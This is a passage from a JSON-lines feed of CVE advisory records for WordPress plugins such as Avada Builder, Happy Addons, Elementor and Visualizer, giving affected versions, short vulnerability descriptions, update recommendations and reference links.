version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.12.8\\\/features\\\/email-confirmation\\\/class-email-confirmation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.12.8\\\/features\\\/email-confirmation\\\/class-email-confirmation.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.12.8\\\/features\\\/email-confirmation\\\/class-email-confirmation.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.12.8\\\/features\\\/email-confirmation\\\/class-email-confirmation.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217544\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217544\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51b626e1-89c0-49b9-bfeb-32005e8e78d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51b626e1-89c0-49b9-bfeb-32005e8e78d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4931","slug":"backupwordpress","versionEndExcluding":"3.13","description":"The BackupWordPress plugin for WordPress is vulnerable to information disclosure in versions up to, and including 3.12. This is due to missing authorization on the heartbeat_received() function that triggers on WordPress heartbeat. This makes it possible for authenticated attackers, with subscriber-level permissions and above to retrieve back-up paths that can subsequently be used to download the back-up.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/747c86f4-118b-4a9c-899c-e9067d2c7a02\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/747c86f4-118b-4a9c-899c-e9067d2c7a02\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2683799%40backupwordpress&new=2683799%40backupwordpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2683799%40backupwordpress&new=2683799%40backupwordpress&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3670","slug":"leaflet-maps-marker","versionImpact":"3.12.8","versionEndExcluding":"3.12.9","description":"The Leaflet Maps Marker (Google Maps, OpenStreetMap, Bing Maps) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mapsmarker' shortcode in all versions up to, and including, 3.12.8 due to insufficient input sanitization and output escaping on user supplied attributes such as 'mapwidthunit'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.12.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62ace939-3c14-4e68-897b-ec845182ca50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62ace939-3c14-4e68-897b-ec845182ca50?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069915\\\/leaflet-maps-marker\\\/trunk\\\/inc\\\/showmap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069915\\\/leaflet-maps-marker\\\/trunk\\\/inc\\\/showmap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4677","slug":"leaflet-maps-marker","versionEndExcluding":"3.12.7","description":"The Leaflet Maps Marker WordPress plugin before 3.12.7 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c293098-de54-4a04-b13d-2a702200f02e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c293098-de54-4a04-b13d-2a702200f02e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10538","slug":"happy-elementor-addons","versionImpact":"3.12.5","versionEndExcluding":"3.12.6","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the before_label parameter in the Image Comparison widget in all versions up to, and including, 3.12.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.12.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd192a52-ae12-4706-b3ea-aa69f7393bb8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd192a52-ae12-4706-b3ea-aa69f7393bb8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182100%40happy-elementor-addons&new=3182100%40happy-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182100%40happy-elementor-addons&new=3182100%40happy-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4794","slug":"aawp","versionEndExcluding":"3.12.3","description":"The AAWP WordPress plugin before 3.12.3 can be used to abuse trusted domains to load malware or other files through it (Reflected File Download) to bypass firewall rules in companies.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/feb4580d-df15-45c8-b59e-ad406e4b064c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/feb4580d-df15-45c8-b59e-ad406e4b064c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8801","slug":"happy-elementor-addons","versionImpact":"3.12.2","versionEndExcluding":"3.12.3","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.12.2 via the Content Switcher widget. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including private, draft, and pending Elementor templates.","recommendation":"Update to version 3.12.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f1078b8-f458-46a6-9982-e8d2d1d1b73b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f1078b8-f458-46a6-9982-e8d2d1d1b73b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/content-switcher\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/content-switcher\\\/widget.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154460\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154460\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6747","slug":"fusion-builder","versionImpact":"3.12.1","versionEndExcluding":"3.12.2","description":"The Avada (Fusion) Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fusion_map' shortcode in all versions up to, and including, 3.12.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.12.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/avada.com\\\/documentation\\\/avada-changelog\\\/\",\"name\":\"https:\\\/\\\/avada.com\\\/documentation\\\/avada-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0a21eaa-4e2a-4d07-8635-f0a8a5db660f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0a21eaa-4e2a-4d07-8635-f0a8a5db660f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0329","slug":"elementor","versionEndExcluding":"3.12.2","description":"The Elementor Website Builder WordPress plugin before 3.12.2 does not properly sanitize and escape the Replace URL parameter in the Tools module before using it in a SQL statement, leading to a SQL injection exploitable by users with the Administrator role.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a875836d-77f4-4306-b275-2b60efff1493\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a875836d-77f4-4306-b275-2b60efff1493\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6708","slug":"profile-builder","versionImpact":"3.12.1","versionEndExcluding":"3.12.2","description":"The User Profile Builder  WordPress plugin before 3.12.2 does not sanitise and escape some parameters before outputting its content on the admin area, which allows Admin+ users to perform Cross-Site Scripting attacks.","recommendation":"Update to version 3.12.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6822bd9-f9f9-41a4-ad19-019b1f03bd4c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6822bd9-f9f9-41a4-ad19-019b1f03bd4c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10682","slug":"bulletin-announcements","versionImpact":"3.11.7","versionEndExcluding":"3.12","description":"The Announcement & Notification Banner \u2013 Bulletin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg and remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.11.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/tags\\\/3.11.5\\\/classes\\\/class-bulletinwp-bulletins-table.php#L145\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/tags\\\/3.11.5\\\/classes\\\/class-bulletinwp-bulletins-table.php#L145\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/tags\\\/3.11.5\\\/classes\\\/class-bulletinwp-bulletins-table.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/tags\\\/3.11.5\\\/classes\\\/class-bulletinwp-bulletins-table.php#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/tags\\\/3.11.5\\\/classes\\\/class-bulletinwp-bulletins-table.php#L152\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/tags\\\/3.11.5\\\/classes\\\/class-bulletinwp-bulletins-table.php#L152\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08033270-5547-437b-95e6-e004b78df5e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08033270-5547-437b-95e6-e004b78df5e4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5395","slug":"wp-automatic","versionImpact":"3.115.0","versionEndExcluding":"3.116.0","description":"The WordPress Automatic Plugin plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'core.php' file in all versions up to, and including, 3.115.0. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.116.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-automatic-plugin\\\/1904470#item-description__changelog\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-automatic-plugin\\\/1904470#item-description__changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57be67fd-8485-495f-b5e9-6eb52af945b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57be67fd-8485-495f-b5e9-6eb52af945b7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1065","slug":"visualizer","versionImpact":"3.11.8","versionEndExcluding":"3.11.9","description":"The Visualizer: Tables and Charts Manager for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Import Data From File feature in all versions up to, and including, 3.11.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.11.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240066\\\/visualizer\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240066\\\/visualizer\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17c1de7b-5178-4fbe-a515-169de4323ae7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17c1de7b-5178-4fbe-a515-169de4323ae7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6366","slug":"profile-builder","versionImpact":"3.11.7","versionEndExcluding":"3.11.8","description":"The User Profile Builder  WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.","recommendation":"Update to version 3.11.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b90cbdd-52cc-4e7b-bf39-bea0dd59e19e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b90cbdd-52cc-4e7b-bf39-bea0dd59e19e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3124","slug":"elementor-pro","versionEndExcluding":"3.11.7","description":"The Elementor Pro plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the update_page_option function in versions up to, and including, 3.11.6. This makes it possible for authenticated attackers with subscriber-level capabilities to update arbitrary site options, which can lead to privilege escalation.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/high-severity-vulnerability-fixed-in-wordpress-elementor-pro-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/high-severity-vulnerability-fixed-in-wordpress-elementor-pro-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/570474f2-c118-45e1-a237-c70b849b2d3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/570474f2-c118-45e1-a237-c70b849b2d3c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4668","slug":"easy-appointments","versionEndExcluding":"3.11.2","description":"The Easy Appointments WordPress plugin before 3.11.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3e43156a-b784-4066-be69-23b139aafbad\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3e43156a-b784-4066-be69-23b139aafbad\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1665","slug":"fusion-builder","versionImpact":"3.11.14","versionEndExcluding":"3.11.15","description":"The Avada (Fusion) Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of the plugin's shortcodes in all versions up to, and including, 3.11.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.11.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/avada.com\",\"name\":\"https:\\\/\\\/avada.com\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94e373fb-b3f5-4c1b-9eaa-89747af4dc30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94e373fb-b3f5-4c1b-9eaa-89747af4dc30?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13345","slug":"fusion-builder","versionImpact":"3.11.13","versionEndExcluding":"3.11.14","description":"The Avada Builder plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.11.13. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 3.11.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/avada.com\\\/documentation\\\/avada-changelog\\\/\",\"name\":\"https:\\\/\\\/avada.com\\\/documentation\\\/avada-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94f6aab3-49a7-4837-a424-e40e483f3f68?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94f6aab3-49a7-4837-a424-e40e483f3f68?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12335","slug":"fusion-builder","versionImpact":"3.11.12","versionEndExcluding":"3.11.13","description":"The Avada (Fusion) Builder plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.11.12 via the handle_clone_post() function and the 'fusion_blog' shortcode and due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 3.11.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/avada.com\",\"name\":\"https:\\\/\\\/avada.com\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4181dcad-b5bd-46db-b47c-3cdee427123c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4181dcad-b5bd-46db-b47c-3cdee427123c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12477","slug":"fusion-builder","versionImpact":"3.11.11","versionEndExcluding":"3.11.12","description":"The Avada Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 3.11.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.11.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/avada.com\",\"name\":\"https:\\\/\\\/avada.com\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c54588f-6436-406f-93cb-b08965586d11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c54588f-6436-406f-93cb-b08965586d11?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5628","slug":"fusion-builder","versionImpact":"3.11.9","versionEndExcluding":"3.11.10","description":"The Avada | Website Builder For WordPress & eCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's fusion_button shortcode in all versions up to, and including, 3.11.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially fixed in 3.11.9. Additional hardening for alternate attack vectors was added to version 3.11.10.","recommendation":"Update to version 3.11.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c23bd29-ba02-4c90-a631-5ce6294d7760?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c23bd29-ba02-4c90-a631-5ce6294d7760?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/avada.com\\\/documentation\\\/avada-changelog\\\/\",\"name\":\"https:\\\/\\\/avada.com\\\/documentation\\\/avada-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/avada.com\\\/blog\\\/version-7-11-9-security-update\\\/\",\"name\":\"https:\\\/\\\/avada.com\\\/blog\\\/version-7-11-9-security-update\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5041","slug":"happy-elementor-addons","versionImpact":"3.10.9","versionEndExcluding":"3.11.0","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018ha-ia-content-button\u2019 parameter in all versions up to, and including, 3.10.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.11.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb037c9f-5d20-46f6-b1ff-34b9d192bad2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb037c9f-5d20-46f6-b1ff-34b9d192bad2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/image-accordion\\\/widget.php#L1462\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/image-accordion\\\/widget.php#L1462\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095128\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095128\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3750","slug":"visualizer","versionImpact":"3.10.15","versionEndExcluding":"3.11.0","description":"The Visualizer: Tables and Charts Manager for WordPress plugin for WordPress is vulnerable to unauthorized modification and retrieval of data due to a missing capability check on the getQueryData() function in all versions up to, and including, 3.10.15. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform arbitrary SQL queries that can be leveraged for privilege escalation among many other actions.","recommendation":"Update to version 3.11.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d27544c-97a5-42cd-ab07-358f819acbc4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d27544c-97a5-42cd-ab07-358f819acbc4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/visualizer\\\/trunk\\\/classes\\\/Visualizer\\\/Module\\\/Chart.php#L1421\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/visualizer\\\/trunk\\\/classes\\\/Visualizer\\\/Module\\\/Chart.php#L1421\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086048\\\/visualizer\\\/tags\\\/3.11.0\\\/classes\\\/Visualizer\\\/Source\\\/Query.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086048\\\/visualizer\\\/tags\\\/3.11.0\\\/classes\\\/Visualizer\\\/Source\\\/Query.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086048\\\/visualizer\\\/tags\\\/3.11.0\\\/classes\\\/Visualizer\\\/Module\\\/Chart.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086048\\\/visualizer\\\/tags\\\/3.11.0\\\/classes\\\/Visualizer\\\/Module\\\/Chart.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3714","slug":"give","versionImpact":"3.10.0","versionEndExcluding":"3.11.0","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'give_form' shortcode when used with a legacy form in all versions up to, and including, 3.10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.11.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd8f5cfa-3431-4617-b2cd-d5a8ce4530f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd8f5cfa-3431-4617-b2cd-d5a8ce4530f4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083390\\\/give\\\/tags\\\/3.11.0\\\/includes\\\/class-give-donate-form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083390\\\/give\\\/tags\\\/3.11.0\\\/includes\\\/class-give-donate-form.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3922","slug":"dokan-pro","versionImpact":"3.10.3","versionEndExcluding":"3.11.0","description":"The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.11.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9de41de-f2f7-4b16-8ec9-d30bbd3d8786?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9de41de-f2f7-4b16-8ec9-d30bbd3d8786?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/dokan.co\\\/docs\\\/wordpress\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/dokan.co\\\/docs\\\/wordpress\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28421","slug":"wp-email-capture","versionEndExcluding":"3.11","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Winwar Media WordPress Email Marketing Plugin \u2013 WP Email Capture.This issue affects WordPress Email Marketing Plugin \u2013 WP Email Capture: from n\/a through 3.10.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-email-capture\\\/wordpress-wp-email-capture-plugin-3-10-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-email-capture\\\/wordpress-wp-email-capture-plugin-3-10-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
